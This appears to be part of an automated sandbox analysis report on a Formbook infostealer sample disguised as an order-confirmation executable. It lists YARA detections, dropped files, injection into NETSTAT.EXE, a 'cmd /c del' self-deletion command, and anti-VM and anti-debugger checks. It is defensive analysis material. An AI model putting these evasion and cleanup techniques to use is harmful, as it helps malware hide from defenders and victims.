          Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/5@16/15
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9A6AD GetLastError,FormatMessageW,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B88DE9 AdjustTokenPrivileges,CloseHandle,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B89399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B94148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeFile created: C:\Users\user\AppData\Local\Temp\nsmE342.tmpJump to behavior
          Source: Order confirmation 64236000000025 26.01.2021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Order confirmation 64236000000025 26.01.2021.exeReversingLabs: Detection: 50%
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeFile read: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe 'C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe'
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: Order confirmation 64236000000025 26.01.2021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: lqqebhptsg.exe, 00000001.00000003.248297924.0000000004FE0000.00000004.00000001.sdmp, 9rd1hxro.exe, 00000002.00000002.291392263.0000000000EFF000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.626687203.000000000351F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lqqebhptsg.exe, 00000001.00000003.248297924.0000000004FE0000.00000004.00000001.sdmp, 9rd1hxro.exe, NETSTAT.EXE, 0000000C.00000002.626687203.000000000351F000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeUnpacked PE file: 2.2.9rd1hxro.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BAC6D9 LoadLibraryA,GetProcAddress,
          Source: 9rd1hxro.exe.1.drStatic PE information: real checksum: 0xdf890 should be: 0xe835e
          Source: Order confirmation 64236000000025 26.01.2021.exeStatic PE information: real checksum: 0x0 should be: 0x9b8d4
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B58B75 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C974 push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004089CE push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C9EC push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C991 push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004152A2 push dword ptr [ebx+ecx*2-3Fh]; retf
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004153CE push ds; retf
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041B3F2 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041B3FB push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041B3A5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041B45C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C4E3 push ebx; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C48C push dword ptr [F84D205Dh]; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00407E1A push ss; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E5D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EB3A5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EB3FB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EB3F2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E53CE push ds; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EBA67 push ss; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC248 push ss; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E52A2 push dword ptr [ebx+ecx*2-3Fh]; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC974 push esp; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC991 push esp; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC9EC push esp; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032D89CE push edx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032D7E1A push ss; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC46E push dword ptr [F84D205Dh]; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EB45C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC4E3 push ebx; ret
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeFile created: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeFile created: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B45EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,KiUserCallbackDispatcher,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BB59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B533B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000032D85E4 second address: 00000000032D85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000032D896E second address: 00000000032D8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6908Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6688Thread sleep count: 42 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6688Thread sleep time: -84000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_004027A1 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9494A GetFileAttributesW,FindFirstFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9CD14 FindFirstFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B45D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
          Source: explorer.exe, 00000004.00000000.273506329.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.259478699.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.273198179.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.259620843.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000002.625682151.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.273568903.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000002.636275608.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.273198179.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.273198179.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.273568903.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.273198179.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BA45D5 BlockInput,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B45240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B65CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BAC6D9 LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E83884 mov eax, dword ptr fs:[00000030h]
